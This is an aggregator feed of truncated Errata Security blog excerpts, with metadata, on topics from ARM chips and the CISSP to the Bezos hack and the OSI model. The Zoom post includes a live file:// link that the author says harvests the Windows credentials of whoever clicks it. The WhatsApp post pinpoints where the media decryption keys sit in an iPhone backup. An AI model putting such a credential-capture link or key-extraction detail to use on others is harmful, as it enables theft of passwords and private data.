take blood plasma from a recently recovered patient and give it to a recently infected patient. Blood plasma is where the blood cells are removed, leaving behind water, salts, other particles, and most importantly, "antibodies". This is the technical concept behind the movie "Outbreak", though of course they completely distort the science.Antibodies are produced by the immune system to recognize and latch onto foreign things, including viruses (the rest of this discussion assumes "viruses"). They either deactivate the virus particle, or mark it to be destroyed by other parts of the immune system, or both.After an initial infection, it takes a while for the body to produce antibodies, allowing the disease to rage unchecked. A massive injection of antibodies during this time allows the disease to be stopped before it gets very far, letting the body's own defenses catch up. That's the premise behind Trump's treatment.An alternative to harvesting natural antibodies from recently recovered patients is to manufacture artificial antibodies using modern science. That's what Regeneron did.An antibody is just another "protein", the building blocks of the body. The protein is in the shape of a Y with the two upper tips formed to lock onto the corresponding parts of a virus ("antigens"). Every new virus requires a new antibody with different tips.The SARS-COV-2 virus has these "spike" proteins on it's surface that allow it to invade the cells in our lungs. They act like a crowbar, jamming themselves into the cell wall, then opening up a hole to allow the rest of the virus inside. Since this is the important and unique prote]]> 2020-10-08T21:44:25+00:00 https://blog.erratasec.com/2020/10/factcheck-regenerons-use-of-embryonic.html www.secnews.physaphae.fr/article.php?IdArticle=1964696 False Guideline None None Errata Security - Errata Security How CEOs think July 16, 2020The only thing more broken than how CEOs view cybersecurity is how cybersecurity experts view cybersecurity. We have this flawed view that cybersecurity is a moral imperative, that it's an aim by itself. We are convinced that people are wrong for not taking security seriously. This isn't true. Security isn't a moral issue but simple cost vs. benefits, risk vs. rewards. Taking risks is more often the correct answer rather than having more security.Rather than experts dispensing unbiased advice, we've become advocates/activists, trying to convince people that they need to do more to secure things. This activism has destroyed our credibility in the boardroom. Nobody thinks we are honest.Most of our advice is actually internal political battles. CEOs trust outside consultants mostly because outsiders don't have a stake in internal politics. Thus, the consultant can say the same thing as what you say, but be trusted.CEOs view cybersecurity the same way they view everything else about building the business, from investment in office buildings, to capital equipment, to HR policies, to marketing programs, to telephone infrastructure, to law firms, to .... everything.They divide their business into two parts:The first is the part they do well, the thing they are experts at, the things that define who they are as a company, their competitive advantage.The second is everything else, the things they don't understand.For the second part, they just want to be average in their industry, or at best, slightly above average. They want their manufacturing costs to be about average. They want the salaries paid to employees to be about average. They want the same video conferencing system as everybody else. Everything outside of core competency is average.I can't express this enough: if it's not their core competency, then they don't want to excel at it. Excelling at a thing comes with a price. They have to pay people more. They have to find the leaders with proven track records at excelling at it. They have to manage excellence.This goes all the way to the top. If it's something the company is going to excel at, then the CEO at the top has to have enough expertise themselves to understand who the best leaders to can accomplish this goal. The CEO can't hire an excellent CSO unless they have enough competency to judge the qualifications of the CSO, and enough competency to hold the CSO accountable for the job they are doing.All this is a tradeoff. A focus of attention on one part of the business means less attention on other parts of the business. If your company excels at cybersecurity, it means not excelling at some other part of the business.So unless you are a company like Google, whose cybersecurity is a competitive advantage, you don't want to excel in cybersecurity. You want to be]]> 2020-07-19T17:07:57+00:00 https://blog.erratasec.com/2020/07/how-ceos-think.html www.secnews.physaphae.fr/article.php?IdArticle=1813717 False Ransomware,Guideline NotPetya None Errata Security - Errata Security In defense of open debate Letter on Justice and Open Debate. It's a rather boring defense of liberalism and the norm of tolerating differing points of view. Mike Masnick wrote rebuttal on Techdirt. In this post, I'm going to rebut his rebuttal, writing a counter-counter-argument.The Letter said that the norms of liberalism tolerate disagreement, and that these norms are under attack by increasing illiberalism on both sides, both the left and the right.My point is this: Masnick avoids the rebutting the letter. He's recycling his arguments against right-wingers who want their speech coddled, rather than the addressing the concerns of (mostly) left-wingers worried about the fanaticism on their own side.Free speechMasnick mentions "free speech" 19 times in his rebuttal -- but the term does not appear in the Harper's letter, not even once. This demonstrates my thesis that his rebuttal misses the point.The term "free speech" has lost its meaning. It's no longer useful for such conversations.Left-wingers want media sites like Facebook, YouTube, the New York Times to remove "bad" speech, like right-wing "misinformation". But, as we've been taught, censoring speech is bad. Therefore, "censoring free speech" has to be redefined to as to not include the above effort.The redefinition claims that the term "free speech" now applies to governments, but not private organizations, that stopping free speech happens only when state power or the courts are involved. In other words, "free speech" is supposed to equate with the "First Amendment", which really does only apply to government ("Congress shall pass no law abridging free speech").That this is false is demonstrated by things like the murders of Charlie Hebdo cartoonist for depicting Muhammad. We all agree this incident is a "free speech" issue, but no government was involved.Right-wingers agree to this new definition, sort of. In much the same way that left-wingers want to narrow "free-speech" to only mean the First Amendment, right-wingers want to expand the "First Amendment" to mean protecting protecting "free speech" against interference by both government and private platforms. They argue that platforms like Facebook have become so pervasive that they have become the "public square", and thus, occupy the same space as government. They therefore want regulations that coddle their speech, preventing their content from being removed.The term "free speech" is therefore no longer useful in explaining the argument because it has become the argument.The Letter avoids this play on words. It's not talking about "free speech", but the "norms of open debate and toleration of differences". It claims first of all that we have a liberal tradition where we tolerate differences of opinion and that we debate these opinions openly. It claims secondly that these norms are weakening, claiming "intolerant climate that has set in on all sides".In other words, those who attacked the NYTimes for publishing the Tom Cotton op-ed are criticized as demonstrating illiberalism and intolerance. This has nothing to do with whatever arguments you have about "free speech".Private platformsMasnick's free speech argument continues that you can't force speech upon private platforms like the New York Times. They have the freedom to make their own editorial decisions about what to publish, choosing some things, rejecting others.It's a good argument, but one the targets the arguments made by right-wingers hostile to the New York Times, and not arguments made by th]]> 2020-07-13T19:22:41+00:00 https://blog.erratasec.com/2020/07/in-defense-of-open-debate.html www.secnews.physaphae.fr/article.php?IdArticle=1802813 False None None None Errata Security - Errata Security Apple ARM Mac rumors It's different this timeThis would be Apple's fourth transition. Their original Macintoshes in 1984 used Motorola 68000 microprocessors. They moved to IBM's PowerPC in 1994, then to Intel's x86 in 2005.However, this history is almost certainly the wrong way to look at the situation. In those days, Apple had little choice. Each transition happened because the processor they were using was failing to keep up with technological change. They had no choice but to move to a new processor.This no longer applies. Intel's x86 is competitive on both speed and power efficiency. It's not going away. If Apple transitions away from x86, they'll still be competing against x86-based computers.Other companies have chosen to adopt both x86 and ARM, rather than one or the other. Microsoft's "Surface Pro" laptops come in either x86 or ARM versions. Amazon's AWS cloud servers come in either x86 or ARM versions. Google's Chromebooks come in either x86 or ARM versions.Instead of ARM replacing x86, Apple may be attempting to provide both as options, possibly an ARM CPU for cheaper systems and an x86 for more expensive and more powerful systems.ARM isn't more power efficient than x86Every news story, every single one, is going to repeat the claim that ARM chips are more power efficient than Intel's x86 chips. Some will claim it's because they are RISC whereas Intel is CISC.This isn't true. RISC vs. CISC was a principle in the 1980s when chips were so small that instruction set differences meant architectural differences. Since 1995 with "out-of-order" processors, the instruction set has been completely separated from the underlying architecture. At most, instruction set differences can't account for more than 5% of the difference between processor performance or efficiency.Mobile chips consume less power by simply being slower. When you scale mobile ARM CPUs up to desktop speeds, they consume the same power as desktops. Conversely, when you scale Intel x86 processors down to mobile power consumption levels, they are just as slow. You can test this yourself by comparing Intel's mobile-oriented "Atom" processor against ARM processors in the Raspberry Pi.Moreover, the CPU accounts for only a small part of overall power consumption. Mobile platforms care more about the graphics processor or video acceleration than they do the CPU. Large differences in CPU efficiency mean small differences in overall platform efficiency.Apple certainly balances its chips so they work better in phones than an Intel x86 would, but these tradeoffs mean they'd work worse in laptops.While overall performance and efficiency will be similar, specific application will perform differently. Thus, when ARM Macintoshes arrive, people will choose just the right benchmarks to "prove" their inherent superiority. It won't be true, but everyone will believe it to be true.No longer a desktop companyVenture capitalist Mary Meeker produces yearly reports on market trends. The desktop computer market has been stagnant for over a decade in the face of mobile growth. The Macintosh is only 10% of Apple's business -- so little that they could abandon the business without noticing a difference.This means investing in the Macintosh business is a poor business decision. Such investment isn't going to produce growth. Investing in a major transition from x86 to ARM is therefore stupid -- it'll cost a lot of money without generating any return.In particular, despite having a mobile CPU for their iPhone, they still don't have a CPU optimized for laptops and desktops. The Macintosh market is just to small to fund]]> 2020-06-16T18:38:07+00:00 https://blog.erratasec.com/2020/06/apple-arm-mac-rumors.html www.secnews.physaphae.fr/article.php?IdArticle=1770293 False Guideline None None Errata Security - Errata Security What is Boolean? Boole was a mathematician who tried to apply the concepts of math to statements of "true" and false", rather than numbers like 1, 2, 3, 4, ... He also did a lot of other mathematical work, but it's this work that continues to bear his name ("boolean logic" or "boolean algebra").But what we know of today as "boolean algebra" was really developed by others. They named it after him, but really all the important stuff was developed later. Moreover, the "1" and "0" of binary computers aren't precisely the same thing as the "true" and "false" of boolean algebra, though there is considerable overlap.Computers are built from things called "transistors" which act as tiny switches, able to turn "on" or "off". Thus, we have the same two-value system as "true" and "false", or "1" and "0".Computers represent any number using "base two" instead of the "base ten" we are accustomed to. The "base" of number representation is the number of digits. The number of digits we use is purely arbitrary. The Babylonians had a base 60 system, computers a base 2, but the math we humans use is base 10, probably because we have 10 fingers.We use a "positional" system. When we run out of digits, we put a '1' on the left side and start over again. Thus, "10" is always the number of digits. If it's base 8, then once you run out of the first eight digits 01234567, you wrap around and start agains with "10", which is the value of eight in base 8.This is in contrast to something like the non-positional Roman numerals, which had symbols for ten (X), hundred (C), and thousand (M).A binary number is a string of 1s and 0s in base two. The number fifty-three, in binary, is 110101.Computers can perform normal arithmetic computations on these numbers, like addition (+), subtraction (−), multiplication (×), and division (÷).But there are also binary arithmetic operation we can do on them, like not (¬), or (∨), xor (⊕), and (∧), shift-left ("), and shift-right ("). That's what we refer to when we say "boolean" arithmetic.Let's take a look at the end operation. The and operator means if both the left "and" right numbers are 1, then the result is 1, but 0 otherwise. In other words: 0 ∧ 0 = 0 0 ∧ 1 = 0 1 ∧ 0 = 0 1 ∧ 1 = 1There are similar "truth tables" for the other operators.While the simplest form of such operators are on individual bits, they are more often applied to larger numbers containing many bits, many base two binary digits. For example, we might have two 8-bit numbers and apply the and operator: 01011100       ∧ 11001101       = 01001100The result is obtained by applying and to each set of matching bits in both numbers. Both numbers have a '1' as the second bit from the left, so the final result has a '1' in that position.Normal arithmetic computations are built from the binary. You can show how a sequence of and and or operations can combine to add two numbers. The entire computer chip is built from sequences of these binary operations -- billions and billions of them.]]> 2020-05-31T17:35:03+00:00 https://blog.erratasec.com/2020/05/what-is-boolean.html www.secnews.physaphae.fr/article.php?IdArticle=1743464 False None None None Errata Security - Errata Security Securing work-at-home apps GimmicksFirst of all, I'd like to discourage you from adding security gimmicks to your product. You are no more likely to come up with an exciting new security feature on your own as you are a miracle cure for the covid. Your sales and marketing people may get excited about the feature, and they may get the customer excited about it too, but the excitement won't last.Eventually, the customer's IT and cybersecurity teams will be brought in. They'll quickly identify your gimmick as snake oil, and you'll have made an enemy of them. They are already involved in securing the server side, the work-at-home desktop, the VPN, and all the other network essentials. You don't want them as your enemy, you want them as your friend. You don't want to send your salesperson into the maw of a technical meeting at the customer's site trying to defend the gimmick.You want to take the opposite approach: do something that the decision maker on the customer side won't necessarily understand, but which their IT/cybersecurity people will get excited about. You want them in the background as your champion rather than as your opposition.Vulnerability disclosure programTo accomplish this goal described above, the thing you want is known as a vulnerability disclosure program. If there's one thing that the entire cybersecurity industry is agreed about (other than hating the term cybersecurity, preferring "infosec" instead) is that you need this vulnerability disclosure program. Everything else you might want to do to add security features in your product come after you have this thing.Your product has security bugs, known as vulnerabilities. This is true of everyone, no matter how good you are. Apple, Microsoft, and Google employ the brightest minds in cybersecurity and they have vulnerabilities. Every month you update their products with the latest fixes for these vulnerabilities. I just bought a new MacBook Air and it's already telling me I need to update the operating system to fix the bugs found after it shipped.These bugs come mostly from outsiders. These companies have internal people searching for such bugs, as well as consultants, and do a good job quietly fixing what they find. But this goes only so far. Outsiders have a wider set of skills and perspectives than the companies could ever hope to control themselves, so find things that the companies miss.These outsiders are often not customers.This has been a chronic problem throughout the history of computers. Somebody calls up your support line and tells you there's an obvious bug that hackers can easily exploit. The customer support representative then ignores this because they aren't a customer. It's foolish wasting time adding features to a product that no customer is asking for.But then this bug leaks out to the public, hackers widely exploit it damaging customers, and angry customers now demand why you did nothing to fix the bug despite having been notified about it.The problem here is that nobody has the job of responding to such problems. The reason your company dropped the ball was that nobody was assigned to pick it up. All a vulnerability disclosure program means that at least one person within the company has the responsibility of dealing with it.How to set up vulnerability disclosure program]]> 2020-05-19T18:03:23+00:00 https://blog.erratasec.com/2020/05/securing-work-at-home-apps.html www.secnews.physaphae.fr/article.php?IdArticle=1719304 False Spam,Vulnerability,Threat,Guideline None 3.0000000000000000 Errata Security - Errata Security CISSP is at most equivalent to a 2-year associates degree Recognition of equivalent qualifications and skillsThe outrage over this has been "equivalent to a master's degree". I don't think this is the case. Instead, it seems "equivalent to professional awards and recognition".The background behind this is how countries recognize "equivalent" work done in other countries. For example, a German Diplom from a university is a bit more than a U.S. bachelor's degree, but a bit less than a U.S. master's degree. How, then, do you find an equivalent between the two?Part of this is occupational, vocational, and professional awards, certifications, and other forms of recognition. A lot of practical work experience is often equivalent to, and even better than, academic coursework.The press release here discusses the UK's NARIC RQF framework, putting the CISSP at level 11. This makes it equivalent to post-graduate coursework and various forms of professional recognition.I'm not sure it means it's the same as a "master's degree". At RQF level 11, there is a fundamental difference between an "award" requiring up to 120 hours of coursework, a "certificate", and a "degree" requiring more than 370 hours of coursework. Assuming everything else checks out, this would place the CISSP at the "award" level, not a "certificate" or "degree" level.The question here is whether the CISSP deserve recognition along with other professional certifications. Below I will argue that it doesn't.Superficial not technicalThe CISSP isn't a technical certification. It covers all the buzzwords in the industry so you know what they refer to, but doesn't explain how anything works. You are tested on the definition of the term "firewall" but you aren't tested on any detail about how firewalls work.This is has an enormous impact on the cybersecurity industry with hordes of "certified" professionals who are none-the-less non-technical, not knowing how things work.This places the CISSP clearly at some lower RQF level. The "RQF level 11" is reserved for people with superior understanding how things work, whereas the CISSP is really an entry-level certification.No college degree requiredThe other certifications at this level tend to require a college degree. They are a refinement of what was learned in college.The opposite is true of the CISSP. It requires no college degree.Now, I'm not a fan of college degrees. Idiots seem capable of getting such degrees without understanding the content, so they are not a good badge of expertise. But at least the majority of college programs take students deeper into understanding the theory of how things work rat]]> 2020-05-13T15:31:34+00:00 https://blog.erratasec.com/2020/05/cissp-is-at-most-equivalent-to-2-year.html www.secnews.physaphae.fr/article.php?IdArticle=1707593 False Guideline None None Errata Security - Errata Security About them Zoom vulns... Now is a good time to remind people to stop using the same password everywhere and to visit https://haveibeenpwned.com to view all the accounts where they've had their password stolen. Using the same password everywhere is the #1 vulnerability the average person is exposed to, and is a possible problem here. For critical accounts (Windows login, bank, email), use a different password for each. (Sure, for accounts you don't care about, use the same password everywhere, I use 'Foobar1234'). Write these passwords down on paper and put that paper in a secure location. Don't print them, don't store them in a file on  your computer. Writing it on a Post-It note taped under your keyboard is adequate security if you trust everyone in your household.If hackers use this Zoom method to steal your Windows password, then you aren't in much danger. They can't log into your computer because it's almost certainly behind a firewall. And they can't use the password on your other accounts, because it's not the same.Why you shouldn't worryThe reason you shouldn't worry about this password stealing problem is because it's everywhere, not just Zoom. It's also here in this browser you are using. If you click on file://hackme.robertgraham.com/foo/bar.html, then I can grab your password in exactly the same way as if you clicked on that vulnerable link in Zoom chat. That's how the Zoom bug works: hackers post these evil links in the chat window during a Zoom conference.It's hard to say Zoom has a vulnerability when so many other applications have the same issue.Many home ISPs block such connections to the Internet, such as Comcast, AT&TCox, Verizon Wireless, and others. If this is the case, when you click on the above link, nothing will happen. Your computer till try to contact hackme.robertgraham.com, and fail. You may be protected from clicking on the above link without doing anything. If your ISP doesn't block such connections, you can configure your home router to do this. Go into the firewall settings and block "TCP port 445 outbound". Alternatively, you can configure Windows to only follow such links internal to your home network, but not to the Internet.If hackers (like me if you click on the above link) gets your password, then they probably can't use use it. That's because while your home Internet router allows outbound connections, it (almost always) blocks inbound connections. Thus, if I steal your Windows password, I can't use it to log into your home computer unless I also break physically into your house. But if I can break into your computer physically, I can hack it without knowing your password.The same arguments apply to corporate desktops. Corporations should block such outbound connections. They ]]> 2020-04-02T01:23:55+00:00 https://blog.erratasec.com/2020/04/about-them-zoom-vulns.html www.secnews.physaphae.fr/article.php?IdArticle=1633464 False Hack,Vulnerability,Threat None None Errata Security - Errata Security Huawei backdoors explanation, explained #backdoor” seem frightening? That's because it's often used incorrectly – sometimes to deliberately create fear. Watch to learn the truth about backdoors and other types of network access. #cybersecurity pic.twitter.com/NEUXbZbcqw- Huawei (@Huawei) March 4, 2020This video seems in response to last month's story about Huawei misusing law enforcement backdoors from the Wall Street Journal. All telco equipment has backdoors usable only by law enforcement, the accusation is that Huawei has a backdoor into this backdoor, so that Chinese intelligence can use it.That story was bogus. Sure, Huawei is probably guilty of providing backdoor access to the Chinese government, but something is deeply flawed with this particular story.We know something is wrong with the story because the U.S. officials cited are anonymous. We don't know who they are or what position they have in the government. If everything they said was true, they wouldn't insist on being anonymous, but would stand up and declare it in a press conference so that every newspaper could report it. When something is not true or spun, then they anonymously "leak" it to a corrupt journalist to report it their way.This is objectively bad journalism. The Society of Professional Journalists calls this the "Washington Game". They also discuss this on their Code of Ethics page. Yes, it's really common in Washington D.C. reporting, you see it all the time, especially with the NYTimes, Wall Street Journal, and Washington Post. But it happens because what the government says is news, regardless of its false or propaganda, giving government officials the ability to influence journalists. Exclusive access to corrupt journalists is how they influence stories.We know the reporter is being especially shady because of the one quote in the story that is attributed to a named official:“We have evidence that Huawei has the capability secretly to access sensitive and personal information in systems it maintains and sells around the world,” said national security adviser Robert O'Brien. This quote is deceptive because O'Brien doesn't say any of the things that readers assume he's saying. He doesn't actually confirm any of the allegations in the rest of the story.It doesn't say.That Huawei has used that capability.That Huawei intentionally put that capability there.That this is special to Huawei (rather than everywhere in the industry).In fact, this quote applies to every telco equipment maker. They all have law enforcement backdoors. These backdoors always hve "controls" to prevent them from being misused. But these controls are always flawed, either in design or how they are used in the real world.Moreover, all telcos have maintenance/service contracts with the equipment makers. When there are ways around such controls, it's the company's own support engineers who will know them.I absolutely believe Huawei that it has don]]> 2020-03-06T15:57:01+00:00 https://blog.erratasec.com/2020/03/huawei-backdoors-explanation-explained.html www.secnews.physaphae.fr/article.php?IdArticle=1585376 False Hack,Threat None None Errata Security - Errata Security A requirements spec for voting One requirement is that the results of an election must seem legitimate. That's why responsible candidates have a "concession speech" when they lose. When John McCain lost the election to Barack Obama, he started his speech with:"My friends, we have come to the end of a long journey. The American people have spoken, and they have spoken clearly. A little while ago, I had the honor of calling Sen. Barack Obama - to congratulate him on being elected the next president of the country that we both love."This was important. Many of his supporters were pointing out irregularities in various states, wanting to continue the fight. But there are always irregularities, or things that look like irregularities. In every election, if a candidate really wanted to, they could drag out an election indefinitely investigating these irregularities. Responsible candidates therefore concede with such speeches, telling their supporters to stop fighting.It's one of the problematic things in our current election system. Even before his likely loss to Hillary, Trump was already stirring up his voters to continue to the fight after the election. He actually won that election, so the fight never occurred, but it was likely to occur. It's hard to imagine Trump ever conceding a fairly won election. I hate to single out Trump here (though he deserves criticism on this issue) because it seems these days both sides are convinced now that the other side is cheating.The goal of adversaries like Putin's Russia isn't necessarily to get favored candidates elected, but to delegitimize the candidates who do get elected. As long as the opponents of the winner believe they have been cheated, then Russia wins.Is the actual requirement of election security that the elections are actually secure? Or is the requirement instead that they appear secure? After all, when two candidates have nearly 50% of the real vote, then it doesn't really matter which one has mathematical legitimacy. It matters more which has political legitimacy.Another requirement is that the rules be fixed ahead of time. This was the big problem in the Florida recounts in the 2000 Bush election. Votes had ambiguities, like hanging chad. The legislature come up with rules how to resolve the ambiguities, how to count the votes, after the votes had been cast. Naturally, the party in power who comes up with the rules will choose those that favor the party.The state of Georgia recently pass a law on election systems. Computer scientists in election security criticized the law because it didn't have their favorite approach, voter verifiable paper ballots. Instead, the ballot printed a bar code.But the bigger problem with the law is that it left open what happens if tampering is discovered. If an audit of the paper ballots finds discrepancies, what happens then? The answer is the legislature comes up with more rules. You don't need to secretly tamper with votes, you can instead do so publicly, so that everyone knows the vote was tampered with. This then throws the problem to the state legislature to decide the victor.Even the most perfectly secured voting system proposed by academics doesn't solve the problem. It'll detect voter tampering, but doesn't resolve when tampering is detected. What do you do with tampered votes? If you throw them out, it means one candidate wins. If you somehow fix them, it means the other candidate w]]> 2020-03-04T15:05:04+00:00 https://blog.erratasec.com/2020/03/a-requirements-spec-for-voting.html www.secnews.physaphae.fr/article.php?IdArticle=1581430 False Guideline None None Errata Security - Errata Security There\'s no evidence the Saudis hacked Jeff Bezos\'s iPhone public report behind the U.N.'s accusations. That report failed to find evidence proving the theory, but instead simply found unknown things it couldn't explain, which it pretended was evidence.This is a common flaw in such forensics reports. When there's evidence, it's usually found and reported. When there's no evidence, investigators keep looking. Todays devices are complex, so if you keep looking, you always find anomalies you can't explain. There's only two results from such investigations: proof of bad things or anomalies that suggest bad things. There's never any proof that no bad things exist (at least, not in my experience).Bizarre and inexplicable behavior doesn't mean a hacker attack. Engineers trying to debug problems, and support technicians helping customers, find such behavior all the time. Pretty much every user of technology experiences this. Paranoid users often think there's a conspiracy against them when electronics behave strangely, but "behaving strangely" is perfectly normal.When you start with the theory that hackers are involved, then you have an explanation for the all that's unexplainable. It's all consistent with the theory, thus proving it. This is called "confirmation bias". It's the same thing that props up conspiracy theories like UFOs: space aliens can do anything, thus, anything unexplainable is proof of space aliens. Alternate explanations, like skunkworks testing a new jet, never seem as plausible.The investigators were hired to confirm bias. Their job wasn't to do an unbiased investigation of the phone, but instead, to find evidence confirming the suspicion that the Saudis hacked Bezos.Remember the story started in February of 2019 when the National Inquirer tried to extort Jeff Bezos with sexts between him and his paramour Lauren Sanchez. Bezos immediately accused the Saudis of being involved. Even after it was revealed that the sexts came from Michael Sanchez, the paramour's brother, Bezos's team double-downed on their accusations the Saudi's hacked Bezos's phone.The FTI report tells a story beginning with Saudi Crown Prince sending Bezos a message using WhatsApp containing a video. The story goes:The downloader that delivered the 4.22MB video was encrypted, delaying or preventing further study of the code delivered along with the video. It should be noted that the encrypted WhatsApp file sent from MBS' account was slightly larger than the video itself.This story is invalid. Such messages use end-to-end encryption, which means that while nobody in between can decrypt them (not even WhatsApp), anybody with possession of the ends can. That's how the technology is supposed to work. If Bezos loses/breaks his phone and needs to restore a backup onto a new phone, the backup needs to have the keys used to decrypt the WhatsApp messages.Thus, the forensics image taken by the investigators had the necessary keys to decrypt the video -- the investigators simply didn't know about them. In a previous blogpost I explain these magical WhatsApp keys and where to find them so that anybody, even you at home, can forensics their own iPhone, retrieve these keys, and decrypt their own videos.]]> 2020-01-28T16:53:00+00:00 https://blog.erratasec.com/2020/01/theres-no-evidence-saudis-hacked-jeff.html www.secnews.physaphae.fr/article.php?IdArticle=1515208 False Hack Uber None Errata Security - Errata Security How to decrypt WhatsApp end-to-end media files End-to-end encrypted downloaderThe FTI report says that within hours of receiving a suspicious video that Bezos's iPhone began behaving strangely. The report says:...analysis revealed that the suspect video had been delivered via an encrypted downloader host on WhatsApp's media server. Due to WhatsApp's end-to-end encryption, the contents of the downloader cannot be practically determined. The phrase "encrypted downloader" is not a technical term but something the investigators invented. It sounds like a term we use in malware/viruses, where a first stage downloads later stages using encryption. But that's not what happened here.Instead, the file in question is simply the video itself, encrypted, with a few extra bytes due to encryption overhead (10 bytes of checksum at the start, up to 15 bytes of padding at the end).Now let's talk about "end-to-end encryption". This only means that those in middle can't decrypt the file, not even WhatsApp's servers. But those on the ends can -- and that's what we have here, one of the ends. Bezos can upgrade his old iPhone X to a new iPhone XS by backing up the old phone and restoring onto the new phone and still decrypt the video. That means the decryption key is somewhere in the backup.Specifically, the decryption key is in the file named 7c7fba66680ef796b916b067077cc246adacf01d in the backup, in the table named ZWAMDIAITEM, as the first protobuf field in the field named ZMEDIAKEY. These details are explained below.WhatsApp end-to-end encryption of videoLet's discuss how videos are transmitted using text messages.We'll start with SMS, the old messaging system built into the phone system that predates modern apps. It can only send short text messages of a few hundred bytes at a time. These messages are too small to hold a complete video many megabytes in size. They are sent through the phone system itself, not via the Internet.When you send a video via SMS what happens is that the video is uploaded to the phone company's servers via HTTP. Then, a text message is sent with a URL link to the video. When the recipient gets the message, their phone downloads the video from the URL. The text messages going through the phone system just contain the URL, an Internet connection is used to transfer the video.This happens transparently to the user. The user just sees the video and not the URL. They'll only notice a difference when using ancient 2G mobile phones that can get the SMS messages but which can't actually connect to the Internet.A similar thing happens with WhatsApp, only with encryption added.The sender first encryp]]> 2020-01-28T14:24:42+00:00 https://blog.erratasec.com/2020/01/how-to-decrypt-whatsapp-end-to-end.html www.secnews.physaphae.fr/article.php?IdArticle=1514927 False Malware,Hack,Tool None None Errata Security - Errata Security So that tweet was misunderstood #MedicareForAll-and we need to tackle corruption and price gouging in drug manufacturing head on. https://t.co/yNxo7yUDri- Elizabeth Warren (@ewarren) September 23, 2019My tweet is widely misunderstood as saying "here's a good alternative", when I meant "here's a less bad alternative". Maybe I was wrong and it's not "less bad", but nobody has responded that way. All the toxic spew on Twitter has been based on their interpretation that I was asserting it was "good".And the reason I chose this particular response is because I thought it was a Democrat talking point. As Bernie Sanders (a 2020 presidential candidate) puts it:“The original insulin patent expired 75 years ago. Instead of falling prices, as one might expect after decades of competition, three drugmakers who make different versions of insulin have continuously raised prices on this life-saving medication.”This is called "evergreening", as described in articles like this one that claim insulin makers have been making needless small improvements to keep their products patent-protected, so that they don't have to compete against generics whose patents have expired.It's Democrats like Bernie who claim expensive insulin is little different than cheaper insulin, not me. If you disagree, go complain to him, not me.Bernie is wrong, by the way. The more expensive "insulin analogs" result in dramatically improved blood sugar control for Type 1 diabetics. The results are life changing, especially when combined with glucose monitors and insulin pumps. Drug companies deserve to recoup the billions spent on these advances. My original point is still true that "cheap insulin" is better than "no insulin", but it's also true that it's far worse than modern, more expensive insulin.Anyway, I wasn't really focused on that part of the argument but the other part, how list prices are an exaggeration. They are a fiction that nobody needs to pay, even those without insurance. They aren't the result of price gouging by drug manufacturers, as Elizabeth Warren claims. Bu]]> 2019-12-30T14:30:20+00:00 https://blog.erratasec.com/2019/12/when-tweets-are-taken-out-of-context.html www.secnews.physaphae.fr/article.php?IdArticle=1494512 False None APT 32 None Errata Security - Errata Security This is finally the year of the ARM server 2019-12-13T16:50:17+00:00 https://blog.erratasec.com/2019/12/this-is-finally-year-of-arm-server.html www.secnews.physaphae.fr/article.php?IdArticle=1493999 False Guideline None None Errata Security - Errata Security CrowdStrike-Ukraine Explained these topics before.Who is CrowdStrike?They are a cybersecurity firm that, among other things, investigates hacker attacks. If you've been hacked by a nation state, then CrowdStrike is the sort of firm you'd hire to come and investigate what happened, and help prevent it from happening again.Why is CrowdStrike mentioned?Because they were the lead investigators in the DNC hack who came to the conclusion that Russia was responsible. The pro-Trump crowd believes this conclusion is false. If the conclusion is false, then it must mean CrowdStrike is part of the anti-Trump conspiracy.Trump always had a thing for CrowdStrike since their first investigation. It's intensified since the Mueller report, which solidified the ties between Trump-Russia, and Russia-DNC-Hack.Personally, I'm always suspicious of such investigations. Politics, either grand (on this scale) or small (internal company politics) seem to drive investigations, creating firm conclusions based on flimsy evidence. But CrowdStrike has made public some pretty solid information, such as BitLy accounts used both in the DNC hacks and other (known) targets of state-sponsored Russian hackers. Likewise, the Mueller report had good data on Bitcoin accounts. I'm sure if I looked at all the evidence, I'd have more doubts, but at the same time, of the politicized hacking incidents out there, this seems to have the best (public) support for the conclusion.What's the conspiracy?The basis of the conspiracy is that the DNC hack was actually an inside job. Some former intelligence officials lead by Bill Binney claim they looked at some data and found that the files were copied "locally" instead of across the Internet, and therefore, it was an insider who did it and not a remote hacker.I debunk the claim here, but the short explanation is: of course the files were copied "locally", the hacker was inside the network. In my long experience investigating hacker intrusions, and performing them myself, I know this is how it's normally done. I mention my own experience because I'm technical and know these things, in contrast with Bill Binney and those other intelligence officials who have no experience with such things. He sounds impressive that he's formerly of the NSA, but he was a mid-level manager in charge of budgets. Binney has never performed a data breach investigation, has never performed a pentest.There's other parts to the conspiracy. In the middle of all this, a DNC staffer was murdered on the street, possibley due to a mugging. Naturally this gets included as part of the conspiracy, this guy ("Seth Rich") must've been the "insider" in this attack, and mus]]> 2019-09-26T13:24:44+00:00 https://blog.erratasec.com/2019/09/crowdstrike-ukraine-explained.html www.secnews.physaphae.fr/article.php?IdArticle=1363510 False Data Breach,Hack,Guideline NotPetya None Errata Security - Errata Security Thread on the OSI model is a lie Twitter thread on the OSI model. Below it's compiled into one blogpost
Yea, I've got 3 hours to kill here in this airport lounge waiting for the next leg of my flight, so let's discuss the "OSI Model". There's no such thing. What they taught you is a lie, and they knew it was a lie, and they didn't care, because they are jerks.You know what REALLY happened when the kid pointed out the king was wearing no clothes? The kid was punished. Nobody cared. And the king went on wearing the same thing, which everyone agreed was made from the finest of cloth.The OSI Model was created by international standards organization for an alternative internet that was too complicated to ever work, and which never worked, and which never came to pass.Sure, when they created the OSI Model, the Internet layered model already existed, so they made sure to include today's Internet as part of their model. But the focus and intent of the OSI's efforts was on dumb networking concepts that worked differently from the Internet.OSI wanted a "connection-oriented network layer", one that worked like the telephone system, where every switch in between the ends knows about the connection. The Internet is based on a "connectionless network layer".Likewise, the big standards bo]]>
2019-08-31T10:25:40+00:00 https://blog.erratasec.com/2019/08/thread-on-osi-model-is-lie.html www.secnews.physaphae.fr/article.php?IdArticle=1297575 False None None None
Errata Security - Errata Security Thread on network input parsers thread on input parsers. I thought I'd copy the thread here as a blogpost.
I am spending far too long on this chapter on "parsers". It's this huge gaping hole in Computer Science where academics don't realize it's a thing. It's like physics missing one of Newton's laws, or medicine ignoring broken bones, or chemistry ignoring fluorine.The problem is that without existing templates of how "parsing" should be taught, it's really hard coming up with a structure for describing it from scratch."Langsec" has the best model, but at the same time, it's a bit abstract ("input is a language that drives computation"), so I want to ease into it with practical examples for programmers.]]>
2019-08-31T10:18:49+00:00 https://blog.erratasec.com/2019/08/thread-on-network-input-parsers.html www.secnews.physaphae.fr/article.php?IdArticle=1297576 False Guideline None None
